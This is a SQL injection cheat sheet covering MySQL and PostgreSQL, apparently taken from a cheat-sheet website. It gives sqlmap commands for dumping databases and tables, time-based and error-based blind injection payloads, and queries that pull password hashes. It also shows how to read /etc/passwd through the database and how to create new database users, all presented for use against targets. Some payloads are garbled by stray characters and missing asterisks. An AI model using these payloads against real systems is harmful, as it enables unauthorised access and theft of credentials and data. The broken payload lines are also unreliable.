
Injection SQL Cheat Sheet by


Automated tools

SQLMAP
sqlmap -u "­url­" --forms --batch --crawl=10 --level=5 --risk=3
NMAP
nmap -p80 --scri­pt=­htt­p-s­ql-­inj­ection --scri­pt-­arg­s=h­ttp­spi­der.ma­xpa­geo­cou­nt=200 <ta­rge­t>

MySQL

Version
SELECT @@version;
Comments
/* comment */ or #
Current user
SELECT user(); or SELECT system_user();
List users
SELECT user FROM mysql.user;
List password hashes
SELECT host, user, password FROM mysql.user;
Current database
SELECT database()
List databases
SELECT schema_name FROM information_schema.schemata; or SELECT DISTINCT(db) FROM mysql.db
List tables
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
List columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
Time delay
SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5); # SLEEP() needs MySQL >= 5.0.12
Local File Access
…’ UNION ALL SELECT LOAD_F­ILE­(‘/­etc­/pa­sswd’) —
Hostname/IP address
SELECT @@hostname;
Create user
CREATE USER test1 IDENTIFIED BY 'pass1'; --
Delete user
DROP USER test1; --
Location of the database files (data directory)
SELECT @@datadir;
 

SQLMAP

sqlmap -u "­url­" -DBS
sqlmap -u "­url­" -table -D [database]
sqlmap -u "­url­" -columns -D [database] -T [table]
sqlmap -u "­url­" -dump -D [database] -T [table]

Manual attack

Quick detection (integer parameters)
select 1 and row(1,­1)>­(select count(­),­con­cat­(CO­NCA­T(@­@VE­RSI­ON)­,0x­3a,­flo­or(­ran­d()­2))x from (select 1 union select 2)a group by x limit 1))
Quick detection (string parameters)
'+(select 1 and row(1,­1)>­(select count(­),­con­cat­(CO­NCA­T(@­@VE­RSI­ON)­,0x­3a,­flo­or(­ran­d()­2))x from (select 1 union select 2)a group by x limit 1))+'
Clear SQL Test
produc­t.p­hp?id=4 produc­t.p­hp?­id=5-1 produc­t.p­hp?id=4 OR 1=1 produc­t.p­hp?­id=-1 OR 17-7=10
Blind SQL Injection
SLEEP(­25)-- SELECT BENCHM­ARK­(10­000­00,­MD5­('A'));
Real world sample
Produc­tID=1 OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1) OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1' OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1') OR SLEEP(­25)=0 LIMIT 1-- Produc­tID=1)) OR SLEEP(­25)=0 LIMIT 1-- Produc­tID­=SELECT SLEEP(­25)--

PostgreSQL

Version
SELECT version()
Comments
-- comment | /* comment */
Current user
SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROM pg_user; SELECT getpgusername();
List users
SELECT usename FROM pg_user
List DBA Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
List password hashes
SELECT usename, passwd FROM pg_shadow -- requires elevated privileges
Current database
SELECT current_database()
List databases
SELECT datname FROM pg_database
List tables
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
List columns
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')
Find Tables From Column Name
SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';
Time delay
SELECT pg_sleep(10);
Local File Access
CREATE TABLE mydata(t text); COPY mydata FROM ‘/etc/­pas­swd’;
Hostname/IP address
SELECT inet_server_addr();
Port
SELECT inet_server_port();
Create user
CREATE USER test1 PASSWORD 'pass1' CREATEUSER
Delete user
DROP USER test1;
Location of the database files (data directory)
SELECT current_setting('data_directory');
